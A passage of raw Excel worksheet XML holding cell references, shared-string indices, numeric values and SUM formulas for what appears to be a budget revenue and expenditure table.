      <c r="V1651" s="17"/>
      <c r="W1651" s="17"/>
      <c r="X1651" s="17"/>
      <c r="Y1651" s="17"/>
      <c r="Z1651" s="17"/>
      <c r="AA1651" s="17"/>
      <c r="AB1651" s="17"/>
      <c r="AC1651" s="17"/>
      <c r="AD1651" s="17"/>
      <c r="AE1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1651" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
    <row r="1652" ht="18" customHeight="1" spans="1:42">
      <c r="A1652" s="44"/>
      <c r="B1652" s="43"/>
      <c r="C1652" s="43"/>
      <c r="D1652" s="10">
        <v>2310432</v>
      </c>
      <c r="E1652" s="40" t="s">
        <v>4274</v>
      </c>
      <c r="F1652" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1652" s="17"/>
      <c r="H1652" s="17"/>
      <c r="I1652" s="17"/>
      <c r="J1652" s="17"/>
      <c r="K1652" s="17"/>
      <c r="L1652" s="17"/>
      <c r="M1652" s="17"/>
      <c r="N1652" s="17"/>
      <c r="O1652" s="17"/>
      <c r="P1652" s="17"/>
      <c r="Q1652" s="17"/>
      <c r="R1652" s="17"/>
      <c r="S1652" s="17"/>
      <c r="T1652" s="17"/>
      <c r="U1652" s="17"/>
      <c r="V1652" s="17"/>
      <c r="W1652" s="17"/>
      <c r="X1652" s="17"/>
      <c r="Y1652" s="17"/>
      <c r="Z1652" s="17"/>
      <c r="AA1652" s="17"/>
      <c r="AB1652" s="17"/>
      <c r="AC1652" s="17"/>
      <c r="AD1652" s="17"/>
      <c r="AE1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1652" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
    <row r="1653" ht="18" customHeight="1" spans="1:42">
      <c r="A1653" s="45"/>
      <c r="B1653" s="45"/>
      <c r="C1653" s="45"/>
      <c r="D1653" s="13">
        <v>2310433</v>
      </c>
      <c r="E1653" s="40" t="s">
        <v>4275</v>
      </c>
      <c r="F1653" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1653" s="17"/>
      <c r="H1653" s="17"/>
      <c r="I1653" s="17"/>
      <c r="J1653" s="17"/>
      <c r="K1653" s="17"/>
      <c r="L1653" s="17"/>
      <c r="M1653" s="17"/>
      <c r="N1653" s="17"/>
      <c r="O1653" s="17"/>
      <c r="P1653" s="17"/>
      <c r="Q1653" s="17"/>
      <c r="R1653" s="17"/>
      <c r="S1653" s="17"/>
      <c r="T1653" s="17"/>
      <c r="U1653" s="17"/>
      <c r="V1653" s="17"/>
      <c r="W1653" s="17"/>
      <c r="X1653" s="17"/>
      <c r="Y1653" s="17"/>
      <c r="Z1653" s="17"/>
      <c r="AA1653" s="17"/>
      <c r="AB1653" s="17"/>
      <c r="AC1653" s="17"/>
      <c r="AD1653" s="17"/>
      <c r="AE1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1653" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
    <row r="1654" ht="18" customHeight="1" spans="1:42">
      <c r="A1654" s="45"/>
      <c r="B1654" s="45"/>
      <c r="C1654" s="45"/>
      <c r="D1654" s="13">
        <v>2310498</v>
      </c>
      <c r="E1654" s="40" t="s">
        <v>4276</v>
      </c>
      <c r="F1654" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1654" s="33"/>
      <c r="H1654" s="33"/>
      <c r="I1654" s="33"/>
      <c r="J1654" s="33"/>
      <c r="K1654" s="33"/>
      <c r="L1654" s="33"/>
      <c r="M1654" s="33"/>
      <c r="N1654" s="33"/>
      <c r="O1654" s="33"/>
      <c r="P1654" s="33"/>
      <c r="Q1654" s="33"/>
      <c r="R1654" s="33"/>
      <c r="S1654" s="33"/>
      <c r="T1654" s="33"/>
      <c r="U1654" s="33"/>
      <c r="V1654" s="33"/>
      <c r="W1654" s="33"/>
      <c r="X1654" s="33"/>
      <c r="Y1654" s="33"/>
      <c r="Z1654" s="33"/>
      <c r="AA1654" s="33"/>
      <c r="AB1654" s="33"/>
      <c r="AC1654" s="33"/>
      <c r="AD1654" s="33"/>
      <c r="AE1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1654" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
    <row r="1655" ht="18" customHeight="1" spans="1:42">
      <c r="A1655" s="45"/>
      <c r="B1655" s="45"/>
      <c r="C1655" s="45"/>
      <c r="D1655" s="13">
        <v>2310499</v>
      </c>
      <c r="E1655" s="40" t="s">
        <v>4277</v>
      </c>
      <c r="F1655" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1655" s="17"/>
      <c r="H1655" s="17"/>
      <c r="I1655" s="17"/>
      <c r="J1655" s="17"/>
      <c r="K1655" s="17"/>
      <c r="L1655" s="17"/>
      <c r="M1655" s="17"/>
      <c r="N1655" s="17"/>
      <c r="O1655" s="17"/>
      <c r="P1655" s="17"/>
      <c r="Q1655" s="17"/>
      <c r="R1655" s="17"/>
      <c r="S1655" s="17"/>
      <c r="T1655" s="17"/>
      <c r="U1655" s="17"/>
      <c r="V1655" s="17"/>
      <c r="W1655" s="17"/>
      <c r="X1655" s="17"/>
      <c r="Y1655" s="17"/>
      <c r="Z1655" s="17"/>
      <c r="AA1655" s="17"/>
      <c r="AB1655" s="17"/>
      <c r="AC1655" s="17"/>
      <c r="AD1655" s="17"/>
      <c r="AE1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1655" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
    <row r="1656" ht="18" customHeight="1" spans="1:42">
      <c r="A1656" s="45"/>
      <c r="B1656" s="45"/>
      <c r="C1656" s="45"/>
      <c r="D1656" s="13">
        <v>23105</v>
      </c>
      <c r="E1656" s="39" t="s">
        <v>4278</v>
      </c>
      <c r="F1656" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1656" s="20"/>
      <c r="H1656" s="20"/>
      <c r="I1656" s="20"/>
      <c r="J1656" s="20"/>
      <c r="K1656" s="20"/>
      <c r="L1656" s="20"/>
      <c r="M1656" s="20"/>
      <c r="N1656" s="20"/>
      <c r="O1656" s="20"/>
      <c r="P1656" s="20"/>
      <c r="Q1656" s="20"/>
      <c r="R1656" s="20"/>
      <c r="S1656" s="20"/>
      <c r="T1656" s="20"/>
      <c r="U1656" s="20"/>
      <c r="V1656" s="20"/>
      <c r="W1656" s="20"/>
      <c r="X1656" s="20"/>
      <c r="Y1656" s="20"/>
      <c r="Z1656" s="20"/>
      <c r="AA1656" s="20"/>
      <c r="AB1656" s="20"/>
      <c r="AC1656" s="20"/>
      <c r="AD1656" s="20"/>
      <c r="AE1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AF1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AG1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AH1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AI1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AJ1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AK1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AL1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AM1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AN1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AO1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
      <c r="AP1656" s="17">
        <f t="shared" si="811"/>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A4:AP1656">
    <extLst/>
  </autoFilter>
  <mergeCells count="1">
    <mergeCell ref="A468:C468"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet8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92D050"/>
  </sheetPr>
  <dimension ref="A1:F1656"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="8" topLeftCell="C1260" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="K1327" sqref="K1327"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.4259259259259" defaultRowHeight="13.2" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="11.8425925925926" style="1" customWidth="1"/>
    <col min="2" max="2" width="41.4259259259259" style="1" customWidth="1"/>
    <col min="3" max="3" width="8.72222222222222" style="1" customWidth="1"/>
    <col min="4" max="4" width="11.4259259259259" style="1" customWidth="1"/>
    <col min="5" max="5" width="41.4259259259259" style="1" customWidth="1"/>
    <col min="6" max="6" width="10.1481481481481" style="1" customWidth="1"/>
    <col min="7" max="256" width="10.4259259259259" style="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="25.8" spans="1:6">
      <c r="A1" s="2" t="s">
        <v>4279</v>
      </c>
      <c r="B1" s="2"/>
      <c r="C1" s="2"/>
      <c r="D1" s="2"/>
      <c r="E1" s="2"/>
      <c r="F1" s="2"/>
    </row>
    <row r="2" spans="1:6">
      <c r="A2" s="3"/>
      <c r="B2" s="4"/>
      <c r="C2" s="4"/>
      <c r="D2" s="4"/>
      <c r="E2" s="4"/>
      <c r="F2" s="5"/>
    </row>
    <row r="3" spans="1:6">
      <c r="A3" s="3"/>
      <c r="B3" s="4"/>
      <c r="C3" s="4"/>
      <c r="D3" s="4"/>
      <c r="E3" s="4"/>
      <c r="F3" s="6" t="s">
        <v>2512</v>
      </c>
    </row>
    <row r="4" spans="1:6">
      <c r="A4" s="7" t="s">
        <v>2513</v>
      </c>
      <c r="B4" s="7" t="s">
        <v>953</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>378</v>
      </c>
      <c r="D4" s="9" t="s">
        <v>2513</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>953</v>
      </c>
      <c r="F4" s="8" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="5" spans="1:6">
      <c r="A5" s="10"/>
      <c r="B5" s="11" t="s">
        <v>2514</v>
      </c>
      <c r="C5" s="12">
        <f>C6+C131</f>
        <v>216067</v>
      </c>
      <c r="D5" s="13"/>
      <c r="E5" s="11" t="s">
        <v>2515</v>
      </c>
      <c r="F5" s="14">
        <f>F6+F235+F275+F294+F384+F436+F492+F549+F675+F747+F826+F849+F960+F1024+F1088+F1108+F1138+F1148+F1193+F1213+F1257+F1313+F1316+F1324</f>
        <v>448503</v>
      </c>
    </row>
    <row r="6" spans="1:6">
      <c r="A6" s="10" t="s">
        <v>4280</v>
      </c>
      <c r="B6" s="11" t="s">
        <v>2516</v>
      </c>
      <c r="C6" s="12">
        <f>C7+C36+C39+C44+C49+C99+C100+C108+C113+C117+C118+SUM(C120:C130)</f>
        <v>157926</v>
      </c>
      <c r="D6" s="13" t="s">
        <v>4281</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>2517</v>
      </c>
      <c r="F6" s="12">
        <f>F7+F19+F28+F39+F50+F61+F72+F80+F89+F102+F111+F122+F134+F141+F149+F155+F162+F169+F176+F183+F190+F198+F204+F210+F217+F232</f>
        <v>49729</v>
      </c>
    </row>
    <row r="7" spans="1:6">
      <c r="A7" s="10" t="s">
        <v>4282</v>
      </c>
      <c r="B7" s="11" t="s">
        <v>2518</v>
      </c>
      <c r="C7" s="12">
        <f>SUM(C8:C13,C15:C35)</f>
        <v>78350</v>
      </c>
      <c r="D7" s="13" t="s">
        <v>4283</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>2519</v>
      </c>
      <c r="F7" s="15">
        <f>SUM(F8:F18)</f>
        <v>791</v>
      </c>
    </row>
    <row r="8" spans="1:6">
      <c r="A8" s="10" t="s">
        <v>4284</v>
      </c>
      <c r="B8" s="16" t="s">
        <v>2520</v>
      </c>
      <c r="C8" s="17">
        <v>406</v>
      </c>
      <c r="D8" s="13" t="s">
        <v>4285</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F8" s="17">
        <v>730</v>
      </c>
    </row>
    <row r="9" spans="1:6">
      <c r="A9" s="10" t="s">
        <v>4286</v>
      </c>
      <c r="B9" s="16" t="s">
        <v>2522</v>
      </c>
      <c r="C9" s="17">
        <v>462</v>
      </c>
      <c r="D9" s="13" t="s">
        <v>4287</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F9" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:6">
      <c r="A10" s="10" t="s">
        <v>4288</v>
      </c>
      <c r="B10" s="16" t="s">
        <v>2524</v>
      </c>
      <c r="C10" s="17">
        <v>48410</v>
      </c>
      <c r="D10" s="13" t="s">
        <v>4289</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F10" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:6">
      <c r="A11" s="10" t="s">
        <v>4290</v>
      </c>
      <c r="B11" s="16" t="s">
        <v>2526</v>
      </c>
      <c r="C11" s="17">
        <v>0</v>
      </c>
      <c r="D11" s="13" t="s">
        <v>4291</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>2527</v>
      </c>
      <c r="F11" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:6">
      <c r="A12" s="10" t="s">
        <v>4292</v>
      </c>
      <c r="B12" s="16" t="s">
        <v>2528</v>
      </c>
      <c r="C12" s="17">
        <v>5589</v>
      </c>
      <c r="D12" s="13" t="s">
        <v>4293</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>2529</v>
      </c>
      <c r="F12" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:6">
      <c r="A13" s="10" t="s">
        <v>4294</v>
      </c>
      <c r="B13" s="16" t="s">
        <v>2530</v>
      </c>
      <c r="C13" s="17">
        <v>13365</v>
      </c>
      <c r="D13" s="13" t="s">
        <v>4295</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>2531</v>
      </c>
      <c r="F13" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6">
      <c r="A14" s="10" t="s">
        <v>4296</v>
      </c>
      <c r="B14" s="16" t="s">
        <v>2532</v>
      </c>
      <c r="C14" s="17">
        <v>0</v>
      </c>
      <c r="D14" s="13" t="s">
        <v>4297</v>
      </c>
      <c r="E14" s="16" t="s">
        <v>2533</v>
      </c>
      <c r="F14" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:6">
      <c r="A15" s="10" t="s">
        <v>4298</v>
      </c>
      <c r="B15" s="16" t="s">
        <v>2534</v>
      </c>
      <c r="C15" s="17">
        <v>0</v>
      </c>
      <c r="D15" s="13" t="s">
        <v>4299</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>2535</v>
      </c>
      <c r="F15" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6">
      <c r="A16" s="10" t="s">
        <v>4300</v>
      </c>
      <c r="B16" s="16" t="s">
        <v>2536</v>
      </c>
      <c r="C16" s="17">
        <v>3031</v>
      </c>
      <c r="D16" s="13" t="s">
        <v>4301</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>2537</v>
      </c>
      <c r="F16" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6">
      <c r="A17" s="10" t="s">
        <v>4302</v>
      </c>
      <c r="B17" s="16" t="s">
        <v>2538</v>
      </c>
      <c r="C17" s="17">
        <v>43</v>
      </c>
      <c r="D17" s="13" t="s">
        <v>4303</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F17" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6">
      <c r="A18" s="10" t="s">
        <v>4304</v>
      </c>
      <c r="B18" s="16" t="s">
        <v>2540</v>
      </c>
      <c r="C18" s="17">
        <v>-70</v>
      </c>
      <c r="D18" s="13" t="s">
        <v>4305</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>2541</v>
      </c>
      <c r="F18" s="17">
        <v>61</v>
      </c>
    </row>
    <row r="19" spans="1:6">
      <c r="A19" s="10" t="s">
        <v>4306</v>
      </c>
      <c r="B19" s="16" t="s">
        <v>2542</v>
      </c>
      <c r="C19" s="17">
        <v>-168</v>
      </c>
      <c r="D19" s="13" t="s">
        <v>4307</v>
      </c>
      <c r="E19" s="11" t="s">
        <v>2543</v>
      </c>
      <c r="F19" s="12">
        <f>SUM(F20:F27)</f>
        <v>580</v>
      </c>
    </row>
    <row r="20" spans="1:6">
      <c r="A20" s="10" t="s">
        <v>4308</v>
      </c>
      <c r="B20" s="16" t="s">
        <v>2544</v>
      </c>
      <c r="C20" s="17">
        <v>0</v>
      </c>
      <c r="D20" s="13" t="s">
        <v>4309</v>
      </c>
      <c r="E20" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F20" s="17">
        <v>502</v>
      </c>
    </row>
    <row r="21" spans="1:6">
      <c r="A21" s="10" t="s">
        <v>4310</v>
      </c>
      <c r="B21" s="16" t="s">
        <v>2545</v>
      </c>
      <c r="C21" s="17">
        <v>0</v>
      </c>
      <c r="D21" s="13" t="s">
        <v>4311</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F21" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:6">
      <c r="A22" s="10" t="s">
        <v>4312</v>
      </c>
      <c r="B22" s="16" t="s">
        <v>2546</v>
      </c>
      <c r="C22" s="17">
        <v>-195</v>
      </c>
      <c r="D22" s="13" t="s">
        <v>4313</v>
      </c>
      <c r="E22" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F22" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6">
      <c r="A23" s="10" t="s">
        <v>4314</v>
      </c>
      <c r="B23" s="16" t="s">
        <v>2547</v>
      </c>
      <c r="C23" s="17">
        <v>0</v>
      </c>
      <c r="D23" s="13" t="s">
        <v>4315</v>
      </c>
      <c r="E23" s="16" t="s">
        <v>2548</v>
      </c>
      <c r="F23" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6">
      <c r="A24" s="10" t="s">
        <v>4316</v>
      </c>
      <c r="B24" s="16" t="s">
        <v>2549</v>
      </c>
      <c r="C24" s="17">
        <v>0</v>
      </c>
      <c r="D24" s="13" t="s">
        <v>4317</v>
      </c>
      <c r="E24" s="16" t="s">
        <v>2550</v>
      </c>
      <c r="F24" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6">
      <c r="A25" s="10" t="s">
        <v>4318</v>
      </c>
      <c r="B25" s="16" t="s">
        <v>2551</v>
      </c>
      <c r="C25" s="17">
        <v>0</v>
      </c>
      <c r="D25" s="13" t="s">
        <v>4319</v>
      </c>
      <c r="E25" s="16" t="s">
        <v>2552</v>
      </c>
      <c r="F25" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6">
      <c r="A26" s="10" t="s">
        <v>4320</v>
      </c>
      <c r="B26" s="16" t="s">
        <v>2553</v>
      </c>
      <c r="C26" s="17">
        <v>0</v>
      </c>
      <c r="D26" s="13" t="s">
        <v>4321</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F26" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:6">
      <c r="A27" s="10" t="s">
        <v>4322</v>
      </c>
      <c r="B27" s="16" t="s">
        <v>2554</v>
      </c>
      <c r="C27" s="17">
        <v>0</v>
      </c>
      <c r="D27" s="13" t="s">
        <v>4323</v>
      </c>
      <c r="E27" s="16" t="s">
        <v>2555</v>
      </c>
      <c r="F27" s="17">
        <v>78</v>
      </c>
    </row>
    <row r="28" spans="1:6">
      <c r="A28" s="10" t="s">
        <v>4324</v>
      </c>
      <c r="B28" s="16" t="s">
        <v>2556</v>
      </c>
      <c r="C28" s="17">
        <v>0</v>
      </c>
      <c r="D28" s="13" t="s">
        <v>4325</v>
      </c>
      <c r="E28" s="11" t="s">
        <v>2557</v>
      </c>
      <c r="F28" s="12">
        <f>SUM(F29:F38)</f>
        <v>22613</v>
      </c>
    </row>
    <row r="29" spans="1:6">
      <c r="A29" s="10" t="s">
        <v>4326</v>
      </c>
      <c r="B29" s="16" t="s">
        <v>2558</v>
      </c>
      <c r="C29" s="17">
        <v>-2441</v>
      </c>
      <c r="D29" s="13" t="s">
        <v>4327</v>
      </c>
      <c r="E29" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F29" s="17">
        <v>18528</v>
      </c>
    </row>
    <row r="30" spans="1:6">
      <c r="A30" s="10" t="s">
        <v>4328</v>
      </c>
      <c r="B30" s="16" t="s">
        <v>2559</v>
      </c>
      <c r="C30" s="17">
        <v>0</v>
      </c>
      <c r="D30" s="13" t="s">
        <v>4329</v>
      </c>
      <c r="E30" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F30" s="17">
        <v>905</v>
      </c>
    </row>
    <row r="31" spans="1:6">
      <c r="A31" s="10" t="s">
        <v>4330</v>
      </c>
      <c r="B31" s="16" t="s">
        <v>2560</v>
      </c>
      <c r="C31" s="17">
        <v>-5930</v>
      </c>
      <c r="D31" s="13" t="s">
        <v>4331</v>
      </c>
      <c r="E31" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F31" s="17">
        <v>83</v>
      </c>
    </row>
    <row r="32" spans="1:6">
      <c r="A32" s="10" t="s">
        <v>4332</v>
      </c>
      <c r="B32" s="16" t="s">
        <v>2561</v>
      </c>
      <c r="C32" s="17">
        <v>0</v>
      </c>
      <c r="D32" s="13" t="s">
        <v>4333</v>
      </c>
      <c r="E32" s="16" t="s">
        <v>2562</v>
      </c>
      <c r="F32" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6">
      <c r="A33" s="10" t="s">
        <v>4334</v>
      </c>
      <c r="B33" s="16" t="s">
        <v>2563</v>
      </c>
      <c r="C33" s="17">
        <v>15848</v>
      </c>
      <c r="D33" s="13" t="s">
        <v>4335</v>
      </c>
      <c r="E33" s="16" t="s">
        <v>2564</v>
      </c>
      <c r="F33" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:6">
      <c r="A34" s="10" t="s">
        <v>4336</v>
      </c>
      <c r="B34" s="16" t="s">
        <v>2565</v>
      </c>
      <c r="C34" s="17">
        <v>0</v>
      </c>
      <c r="D34" s="13" t="s">
        <v>4337</v>
      </c>
      <c r="E34" s="16" t="s">
        <v>2566</v>
      </c>
      <c r="F34" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6">
      <c r="A35" s="10" t="s">
        <v>4338</v>
      </c>
      <c r="B35" s="16" t="s">
        <v>2567</v>
      </c>
      <c r="C35" s="17">
        <v>0</v>
      </c>
      <c r="D35" s="13" t="s">
        <v>4339</v>
      </c>
      <c r="E35" s="16" t="s">
        <v>2568</v>
      </c>
      <c r="F35" s="17">
        <v>371</v>
      </c>
    </row>
    <row r="36" spans="1:6">
      <c r="A36" s="10" t="s">
        <v>4340</v>
      </c>
      <c r="B36" s="11" t="s">
        <v>2569</v>
      </c>
      <c r="C36" s="17">
        <v>0</v>
      </c>
      <c r="D36" s="13" t="s">
        <v>4341</v>
      </c>
      <c r="E36" s="16" t="s">
        <v>2570</v>
      </c>
      <c r="F36" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6">
      <c r="A37" s="10" t="s">
        <v>4342</v>
      </c>
      <c r="B37" s="16" t="s">
        <v>2571</v>
      </c>
      <c r="C37" s="17">
        <v>0</v>
      </c>
      <c r="D37" s="13" t="s">
        <v>4343</v>
      </c>
      <c r="E37" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F37" s="17">
        <v>351</v>
      </c>
    </row>
    <row r="38" spans="1:6">
      <c r="A38" s="10" t="s">
        <v>4344</v>
      </c>
      <c r="B38" s="16" t="s">
        <v>2572</v>
      </c>
      <c r="C38" s="17">
        <v>0</v>
      </c>
      <c r="D38" s="13" t="s">
        <v>4345</v>
      </c>
      <c r="E38" s="16" t="s">
        <v>2573</v>
      </c>
      <c r="F38" s="17">
        <v>2375</v>
      </c>
    </row>
    <row r="39" spans="1:6">
      <c r="A39" s="10"/>
      <c r="B39" s="11" t="s">
        <v>2574</v>
      </c>
      <c r="C39" s="12">
        <f>C40+C41</f>
        <v>0</v>
      </c>
      <c r="D39" s="13" t="s">
        <v>4346</v>
      </c>
      <c r="E39" s="11" t="s">
        <v>2575</v>
      </c>
      <c r="F39" s="12">
        <f>SUM(F40:F49)</f>
        <v>1753</v>
      </c>
    </row>
    <row r="40" spans="1:6">
      <c r="A40" s="10" t="s">
        <v>4347</v>
      </c>
      <c r="B40" s="16" t="s">
        <v>2576</v>
      </c>
      <c r="C40" s="17">
        <v>0</v>
      </c>
